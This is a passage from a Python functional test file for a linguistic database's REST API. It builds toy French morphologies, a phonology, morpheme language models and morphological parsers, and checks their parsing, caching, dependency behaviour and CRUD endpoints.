PHICat)' in morphology_script # cf. chien-s\n assert u'(DCat \"-\" PHICat)' in morphology_script # cf. le-s\n assert u'(VCat \"-\" AGRCat)' in morphology_script # cf. nage-aient, parle-ait\n assert u'c h a t' in morphology_script # cf. extract_morphemes_from_rules_corpus = False and chat's exclusion from the lexicon corpus\n assert u'c h i e n' in morphology_script\n assert u'b e \\u0301 c a s s e' in morphology_script\n assert resp['compile_succeeded'] == True\n assert resp['compile_message'] == u'Compilation process terminated successfully and new binary file was written.'\n assert morphology_binary_filename in morphology_dir_contents\n assert resp['modifier']['role'] == u'contributor'\n rules = resp['rules_generated']\n assert u'D' in rules # cf. le\n assert u'N' in rules # cf. tortue\n assert u'D-PHI' in rules # cf. le-s\n assert u'N-PHI' in rules # cf. chien-s\n assert u'V-AGR' in rules # cf. nage-aient, parle-ait\n assert 'lexicon' in resp\n assert 'script' in resp\n assert resp['script'] == morphology_script\n assert [u'chat', u'cat'] in resp['lexicon']['N']\n assert [u'chien', u'dog'] in resp['lexicon']['N']\n\n # Test GET /morphologies/1?script=1&lexicon=1 and make sure the script and lexicon are returned\n response = self.app.get(url('morphology', id=impoverished_morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n assert resp['script'] == morphology_script\n lexicon = resp['lexicon']\n assert ['s', 'PL'] in lexicon['PHI']\n assert ['oiseau', 'bird'] in lexicon['N']\n assert ['aient', '3PL.IMPV'] in lexicon['AGR']\n assert ['la', 'the'] in lexicon['D']\n assert ['nage', 'swim'] in lexicon['V']\n\n ################################################################################\n # END IMPOVERISHED REPRESENTATION MORPHOLOGY\n ################################################################################\n\n # Create a very simple French phonology\n script = u'''\ndefine eDrop e -> 0 || _ \"-\" a;\ndefine breakDrop \"-\" -> 0;\ndefine phonology eDrop .o. breakDrop;\n '''\n params = self.phonology_create_params.copy()\n params.update({\n 'name': u'Phonology',\n 'description': u'Covers a lot of the data.',\n 'script': script\n })\n params = json.dumps(params)\n response = self.app.post(url('phonologies'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n phonology_id = resp['id']\n\n ################################################################################\n # LANGUAGE MODEL 1 \n ################################################################################\n\n # Create a corpus heavily stacked towards tombe|fall-ait|3SG.IMPV and V-AGR\n # as opposed to tombe|fall-ait|3IMP and V-Agr.\n sentences = Session.query(model.Form).filter(model.Form.syntactic_category.has(\n model.SyntacticCategory.name==u'S')).all()\n target_id = [s for s in sentences if s.transcription == u'La tortue tombait'][0].id\n sentence_ids = [s.id for s in sentences] + [target_id] * 100\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of sentences with lots of form %s' % target_id,\n 'content': u','.join(map(unicode, sentence_ids))\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n lm_corpus_id = json.loads(response.body)['id']\n\n # Create the LM using lm_corpus\n name = u'Morpheme language model'\n params = self.morpheme_language_model_create_params.copy()\n params.update({\n 'name': name,\n 'corpus': lm_corpus_id,\n 'toolkit': 'mitlm'\n })\n params = json.dumps(params)\n response = self.app.post(url('morphemelanguagemodels'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morpheme_language_model_id = resp['id']\n assert resp['name'] == name\n assert resp['toolkit'] == u'mitlm'\n assert resp['order'] == 3\n assert resp['smoothing'] == u'' # The ModKN smoothing algorithm is the implicit default with MITLM\n\n # Generate the files of the language model\n response = self.app.put(url(controller='morphemelanguagemodels', action='generate', id=morpheme_language_model_id),\n {}, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n lm_generate_attempt = resp['generate_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphemelanguagemodel', id=morpheme_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', lm_generate_attempt, log, wait=1, vocal=False)\n assert resp['generate_message'] == u'Language model successfully generated.'\n\n ################################################################################\n # LANGUAGE MODEL 2 -- CATEGORIAL\n ################################################################################\n\n categorial_lm_name = u'Morpheme language model -- categorial'\n params = self.morpheme_language_model_create_params.copy()\n params.update({\n 'name': categorial_lm_name,\n 'corpus': lm_corpus_id,\n 'toolkit': 'mitlm',\n 'categorial': True\n })\n params = json.dumps(params)\n response = self.app.post(url('morphemelanguagemodels'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n categorial_language_model_id = resp['id']\n assert resp['name'] == categorial_lm_name\n assert resp['toolkit'] == u'mitlm'\n assert resp['order'] == 3\n assert resp['smoothing'] == u'' # The ModKN smoothing algorithm is the implicit default with MITLM\n assert resp['categorial'] == True\n\n # Generate the files of the language model\n response = self.app.put(url(controller='morphemelanguagemodels', action='generate',\n id=categorial_language_model_id),\n {}, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n lm_generate_attempt = resp['generate_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphemelanguagemodel', id=categorial_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', lm_generate_attempt, log, wait=1, vocal=False)\n assert resp['generate_message'] == u'Language model successfully generated.'\n\n ################################################################################\n # TRANSCRIPTIONS & PARSES\n ################################################################################\n\n transcription1 = u'tombait'\n transcription1_correct_parse = u'%s-%s' % (\n h.rare_delimiter.join([u'tombe', u'fall', u'V']),\n h.rare_delimiter.join([u'ait', u'3SG.IMPV', u'AGR']))\n transcription1_alt_parse = u'%s-%s' % (\n h.rare_delimiter.join([u'tombe', u'fall', u'V']),\n h.rare_delimiter.join([u'ait', u'3IMP', u'Agr']))\n transcription1_impoverished_parse = u'tombe-ait'\n transcription2 = u'tombeait'\n transcription3 = u'chiens'\n transcription3_correct_parse = u'%s-%s' % (\n h.rare_delimiter.join([u'chien', u'dog', u'N']),\n h.rare_delimiter.join([u's', u'PL', u'PHI']))\n transcription3_impoverished_parse = u'chiens-s'\n\n\n ################################################################################\n # MORPHOLOGICAL PARSER 1\n ################################################################################\n\n # Create a morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French',\n 'phonology': phonology_id,\n 'morphology': morphology_id,\n 'language_model': morpheme_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST\n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_correct_parse in resp[transcription1]\n assert len(resp[transcription1]) == 2\n assert resp[transcription2] == []\n\n # Test how well the morphological parser parses some test words.\n # In-memory cache will result in the second request to parse transcription 1\n # being accomplished via dict lookup. Parses for both transcriptions 1 and 2\n # will be persisted across requests in the ``parse`` table.\n params = json.dumps({'transcriptions': [transcription1, transcription1, transcription3]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n assert resp[transcription3] == transcription3_correct_parse\n\n # Make the same parse request again. This time the persistent cache will be used\n # and all of the parses returned will be from the cache, i.e., no subprocesses to \n # flookup will be initiated.\n params = json.dumps({'transcriptions': [transcription1, transcription1, transcription3, 'abc']})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n assert resp[transcription3] == transcription3_correct_parse\n assert resp['abc'] == None\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 1\n ################################################################################\n\n ################################################################################\n # MORPHOLOGICAL PARSER 2\n ################################################################################\n\n # Create an impoverished morphemes morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French, impoverished morphemes',\n 'phonology': phonology_id,\n 'morphology': impoverished_morphology_id,\n 'language_model': morpheme_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST\n # Because the morphology returns impoverished representations, the morphophonology_\n # will too.\n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_impoverished_parse in resp[transcription1]\n assert len(resp[transcription1]) == 1\n assert resp[transcription2] == []\n\n # Test applydown on the mophological parser's morphophonology FST\n params = json.dumps({'morpheme_sequences': [transcription1_impoverished_parse]})\n response = self.app.put(url(controller='morphologicalparsers', action='applydown',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1 in resp[transcription1_impoverished_parse]\n\n # Test how well the morphological parser parses some test words.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n\n # Note how the rich representation is always returned by a parser even if its morphophonology\n # returns impoverished ones. The ``parse`` action disambiguates the morphemic analysis received\n # from the morphophonology before selecting the most probable candidate.\n assert resp[transcription1] == transcription1_correct_parse\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 2\n ################################################################################\n\n ################################################################################\n # MORPHOLOGICAL PARSER 3 -- categorial LM\n ################################################################################\n\n # Create categorial LM morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French, categorial LM',\n 'phonology': phonology_id,\n 'morphology': morphology_id,\n 'language_model': categorial_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST. Everything should\n # work just like parser #1.\n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_correct_parse in resp[transcription1]\n assert len(resp[transcription1]) == 2\n assert resp[transcription2] == []\n\n # Test applydown on the mophological parser's morphophonology FST\n params = json.dumps({'morpheme_sequences': [transcription1_correct_parse]})\n response = self.app.put(url(controller='morphologicalparsers', action='applydown',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1 in resp[transcription1_correct_parse]\n\n # Test how well the morphological parser parses some test words.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n # There is only one possible parse for transcription 1 -- it is de facto the most probable\n assert resp[transcription1] == transcription1_correct_parse\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 3\n ################################################################################\n\n ################################################################################\n # MORPHOLOGICAL PARSER 4 -- categorial LM & impoverished morphology\n ################################################################################\n\n # Create categorial LM, impoverished morphology morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French, categorial LM, impoverished morphology',\n 'phonology': phonology_id,\n 'morphology': impoverished_morphology_id,\n 'language_model': categorial_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = parser_4_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST. Expect to get morpheme \n # form sequences. \n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_impoverished_parse in resp[transcription1]\n assert len(resp[transcription1]) == 1\n assert resp[transcription2] == []\n\n # Test applydown on the mophological parser's morphophonology FST\n params = json.dumps({'morpheme_sequences': [transcription1_impoverished_parse]})\n response = self.app.put(url(controller='morphologicalparsers', action='applydown',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1 in resp[transcription1_impoverished_parse]\n\n # Test how well the morphological parser parses some test words.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n # parse time disambiguation and categorial LM application should all conspire to return the correct parse...\n assert resp[transcription1] == transcription1_correct_parse\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 4\n ################################################################################\n\n ################################################################################\n # TEST PARSER DEPENDENCY REPLICATION\n ################################################################################\n\n # Vacuously re-generate and re-compile the parser\n ################################################################################\n\n # Show that the cache will not be cleared.\n\n parser_4_parses = sorted([parse.transcription for parse in Session.query(model.Parse).\\\n filter(model.Parse.parser_id==parser_4_id).all()])\n\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=parser_4_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll GET /morphologicalparsers/id until compile_attempt changes.\n requester = lambda: self.app.get(url('morphologicalparser', id=parser_4_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'compile_attempt', morphological_parser_compile_attempt,\n log, wait=1, vocal=True, task_descr='compile parser %s' % parser_4_id)\n\n # Perform the same parse request as previously and expect the same results.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=parser_4_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n\n parser_4_parses_now = sorted([parse.transcription for parse in Session.query(model.Parse).\\\n filter(model.Parse.parser_id==parser_4_id).all()])\n assert parser_4_parses == parser_4_parses_now\n\n # Update the parser's LM\n ################################################################################\n\n # The parsing behaviour of the parser will not change because it has not been\n # re-generated or re-compiled.\n\n # For the updated LM, create a new corpus heavily stacked towards V-Agr.\n sentences = Session.query(model.Form).filter(model.Form.syntactic_category.has(\n model.SyntacticCategory.name==u'S')).all()\n # The sentence below is analyzed using an Agr-categorized suffix\n target_id = [s for s in sentences if s.transcription == u'Le chien parlait'][0].id\n sentence_ids = [s.id for s in sentences] + [target_id] * 100\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of sentences with lots of form %s' % target_id,\n 'content': u','.join(map(unicode, sentence_ids))\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n lm_corpus_2_id = json.loads(response.body)['id']\n\n # update the categorial LM so that its corpus is the newly created one.\n params = self.morpheme_language_model_create_params.copy()\n params.update({\n 'name': categorial_lm_name,\n 'corpus': lm_corpus_2_id, # HERE IS THE CHANGE\n 'toolkit': 'mitlm',\n 'categorial': True\n })\n params = json.dumps(params)\n response = self.app.put(url('morphemelanguagemodel', id=categorial_language_model_id),\n params, self.json_headers, self.extra_environ_admin)\n\n # Request that the files of the language model be generated anew; this will create a new\n # LMTree pickle file.\n response = self.app.put(url(controller='morphemelanguagemodels', action='generate',\n id=categorial_language_model_id),\n {}, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n lm_generate_attempt = resp['generate_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphemelanguagemodel', id=categorial_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', lm_generate_attempt, log, wait=1, vocal=False)\n assert resp['generate_message'] == u'Language model successfully generated.'\n\n # Now if we try to parse \"tombait\" using parser #4 we will still get the V-AGR parse\n # even though the LM associated to that parser (the categorial one) has been changed to be\n # weighted heavily towards the V-Agr parse.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=parser_4_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n\n # Request probabilities form the just re-generated LM and expect V-Agr to be higher.\n likely_word = u'V Agr'\n unlikely_word = u'V AGR'\n ms_params = json.dumps({'morpheme_sequences': [likely_word, unlikely_word]})\n response = self.app.put(url(controller='morphemelanguagemodels', action='get_probabilities',\n id=categorial_language_model_id), ms_params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n likely_word_log_prob = resp[likely_word]\n unlikely_word_log_prob = resp[unlikely_word]\n assert likely_word_log_prob > unlikely_word_log_prob\n\n # Re-generate and re-compile the parser\n ################################################################################\n\n # Expect it to now parse tombait as tombe-ait fall-3IMP V-Agr\n\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=parser_4_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphologicalparser', id=parser_4_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'compile_attempt', morphological_parser_compile_attempt,\n log, wait=1, vocal=True, task_descr='compile parser %s' % parser_4_id)\n\n # Perform the same parse request as above and expect different results.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=parser_4_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] != transcription1_correct_parse\n assert resp[transcription1] == transcription1_alt_parse\n\n # Delete the parser's LM\n ################################################################################\n\n # Expect it to still work as previously.\n\n response = self.app.delete(url('morphemelanguagemodel', id=categorial_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_alt_parse\n\n # If we re-generate and re-compile, the compile will succeed (since it requires only a \n # phonology and a morphology) while the generate attempt will fail because there \n # will be no LM object to copy attribute values and file objects from.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=parser_4_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphologicalparser', id=parser_4_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'compile_attempt', morphological_parser_compile_attempt,\n log, wait=1, vocal=True, task_descr='compile parser %s' % parser_4_id)\n assert resp['compile_succeeded'] == True\n assert resp['generate_succeeded'] == False\n\n # Test GET /morphologicalparsers\n ################################################################################\n\n morphological_parsers = Session.query(MorphologicalParser).all()\n\n # Get all morphological parsers\n response = self.app.get(url('morphologicalparsers'), headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert len(resp) == 4\n\n # Test the paginator GET params.\n paginator = {'items_per_page': 1, 'page': 1}\n response = self.app.get(url('morphologicalparsers'), paginator, headers=self.json_headers,\n extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert len(resp['items']) == 1\n assert resp['items'][0]['name'] == morphological_parsers[0].name\n assert response.content_type == 'application/json'\n\n # Test the order_by GET params.\n order_by_params = {'order_by_model': 'MorphologicalParser', 'order_by_attribute': 'id',\n 'order_by_direction': 'desc'}\n response = self.app.get(url('morphologicalparsers'), order_by_params,\n headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert resp[0]['id'] == morphological_parsers[-1].id\n assert response.content_type == 'application/json'\n\n # Test the order_by *with* paginator.\n params = {'order_by_model': 'MorphologicalParser', 'order_by_attribute': 'id',\n 'order_by_direction': 'desc', 'items_per_page': 1, 'page': 4}\n response = self.app.get(url('morphologicalparsers'), params,\n headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert morphological_parsers[0].name == resp['items'][0]['name']\n\n # Expect a 400 error when the order_by_direction param is invalid\n order_by_params = {'order_by_model': 'MorphologicalParser', 'order_by_attribute': 'name',\n 'order_by_direction': 'descending'}\n response = self.app.get(url('morphologicalparsers'), order_by_params, status=400,\n headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert resp['errors']['order_by_direction'] == u\"Value must be one of: asc; desc (not u'descending')\"\n assert response.content_type == 'application/json'\n\n # Test that GET /morphologicalparsers/<id> works correctly.\n\n # Try to get a morphological parser using an invalid id\n id = 100000000000\n response = self.app.get(url('morphologicalparser', id=id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin, status=404)\n resp = json.loads(response.body)\n assert u'There is no morphological parser with id %s' % id in json.loads(response.body)['error']\n assert response.content_type == 'application/json'\n\n # No id\n response = self.app.get(url('morphologicalparser', id=''), status=404,\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n assert json.loads(response.body)['error'] == 'The resource could not be found.'\n assert response.content_type == 'application/json'\n\n # Valid id\n response = self.app.get(url('morphologicalparser', id=morphological_parsers[0].id), headers=self.json_headers,\n extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp['name'] == morphological_parsers[0].name\n assert resp['description'] == morphological_parsers[0].description\n assert response.content_type == 'application/json'\n\n # Tests that GET /morphologicalparsers/new and GET /morphologicalparsers/id/edit return \n # the data needed to create or update a morphological parser.\n\n # Test GET /morphologicalparsers/new\n response = self.app.get(url('new_morphologicalparser'), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert len(resp['phonologies']) == 1\n assert len(resp['morphologies']) == 2\n assert len(resp['morpheme_language_models']) == 1\n\n # Not logged in: expect 401 Unauthorized\n response = self.app.get(url('edit_morphologicalparser', id=morphological_parsers[0].id), status=401)\n resp = json.loads(response.body)\n assert resp['error'] == u'Authentication is required to access this resource.'\n assert response.content_type == 'application/json'\n\n # Invalid id\n id = 9876544\n response = self.app.get(url('edit_morphologicalparser', id=id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin,\n status=404)\n assert u'There is no morphological parser with id %s' % id in json.loads(response.body)['error']\n assert response.content_type == 'application/json'\n\n # No id\n response = self.app.get(url('edit_morphologicalparser', id=''), status=404,\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n assert json.loads(response.body)['error'] == 'The resource could not be found.'\n assert response.content_type == 'application/json'\n\n # Valid id\n response = self.app.get(url('edit_morphologicalparser', id=morphological_parsers[0].id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp['morphological_parser']['name'] == morphological_parsers[0].name\n assert len(resp['data']['phonologies']) == 1\n assert len(resp['data']['morphologies']) == 2\n assert len(resp['data']['morpheme_language_models']) == 1\n assert response.content_type == 'application/json'\n\n # Tests that PUT /morphologicalparsers/id updates the morphological parser with id=id.\n\n foma_installed = h.foma_installed(force_check=True)\n\n morphological_parsers = [json.loads(json.dumps(m, cls=h.JSONOLDEncoder))\n for m in Session.query(MorphologicalParser).all()]\n morphological_parser_1_id = morphological_parsers[0]['id']\n morphological_parser_1_name = morphological_parsers[0]['name']\n morphological_parser_1_description = morphological_parsers[0]['description']\n morphological_parser_1_modified = morphological_parsers[0]['datetime_modified']\n morphological_parser_1_phonology_id = morphological_parsers[0]['phonology']['id']\n morphological_parser_1_morphology_id = morphological_parsers[0]['morphology']['id']\n morphological_parser_1_lm_id = morphological_parsers[0]['language_model']['id']\n morphological_parser_count = len(morphological_parsers)\n morphological_parser_1_dir = os.path.join(self.morphological_parsers_path,\n 'morphological_parser_%d' % morphological_parser_1_id)\n morphological_parser_1_morphophonology_path = os.path.join(\n morphological_parser_1_dir, 'morphophonology.script')\n if foma_installed:\n morphology_1_morphophonology = codecs.open(morphological_parser_1_morphophonology_path,\n mode='r', encoding='utf8').read()\n\n # Update the first morphological parser.\n original_backup_count = Session.query(MorphologicalParserBackup).count()\n params = self.morphology_create_params.copy()\n params.update({\n 'name': morphological_parser_1_name,\n 'description': u'New description',\n 'phonology': morphological_parser_1_phonology_id,\n 'morphology': morphological_parser_1_morphology_id,\n 'language_model': morphological_parser_1_lm_id\n })\n params = json.dumps(params)\n response = self.app.put(url('morphologicalparser', id=morphological_parser_1_id), params, self.json_headers,\n self.extra_environ_admin)\n resp = json.loads(response.body)\n new_backup_count = Session.query(MorphologicalParserBackup).count()\n datetime_modified = resp['datetime_modified']\n new_morphological_parser_count = Session.query(MorphologicalParser).count()\n assert morphological_parser_count == new_morphological_parser_count\n assert datetime_modified != morphological_parser_1_modified\n assert resp['description'] == u'New description'\n assert response.content_type == 'application/json'\n assert original_backup_count + 1 == new_backup_count\n backup = Session.query(MorphologicalParserBackup).filter(\n MorphologicalParserBackup.UUID==unicode(\n resp['UUID'])).order_by(\n desc(MorphologicalParserBackup.id)).first()\n assert backup.datetime_modified.isoformat() == morphological_parser_1_modified\n assert backup.description == morphological_parser_1_description\n assert response.content_type == 'application/json'\n\n # Attempt an update with no new input and expect to fail\n response = self.app.put(url('morphologicalparser', id=morphological_parser_1_id), params, self.json_headers,\n self.extra_environ_admin, status=400)\n resp = json.loads(response.body)\n morphological_parser_count = new_morphological_parser_count\n new_morphological_parser_count = Session.query(MorphologicalParser).count()\n our_morphological_parser_datetime_modified = Session.query(\n MorphologicalParser).get(morphological_parser_1_id).datetime_modified\n assert our_morphological_parser_datetime_modified.isoformat() == datetime_modified\n assert morphological_parser_count == new_morphological_parser_count\n assert resp['error'] == u'The update request failed because the submitted data were not new.'\n assert response.content_type == 'application/json'\n\n # Update the first morphological parser again.\n original_backup_count = new_backup_count\n params = self.morphology_create_params.copy()\n params.update({\n 'name': morphological_parser_1_name,\n 'description': u'Newer description',\n 'phonology': morphological_parser_1_phonology_id,\n 'morphology': morphological_parser_1_morphology_id,\n 'language_model': morphological_parser_1_lm_id\n })\n params = json.dumps(params)\n response = self.app.put(url('morphologicalparser', id=morphological_parser_1_id), params, self.json_headers,\n 